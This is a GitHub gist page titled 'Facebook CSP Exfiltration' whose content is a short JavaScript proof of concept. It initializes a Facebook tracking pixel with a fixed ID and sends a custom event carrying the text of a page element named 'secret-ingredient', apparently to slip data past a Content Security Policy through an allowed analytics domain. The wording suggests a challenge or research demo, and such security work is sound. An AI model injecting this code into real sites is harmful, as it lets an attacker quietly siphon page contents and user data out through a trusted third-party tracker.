Created
August 23, 2023 14:45
-
-
Save felmoltor/311a22a77e7c338ff97817579dd786d3 to your computer and use it in GitHub Desktop.
Facebook CSP Exfiltration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fbq('init', '1179785999289471'); | |
fbq('trackCustom', 'MyEvent-keyfc',{ | |
data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'" | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment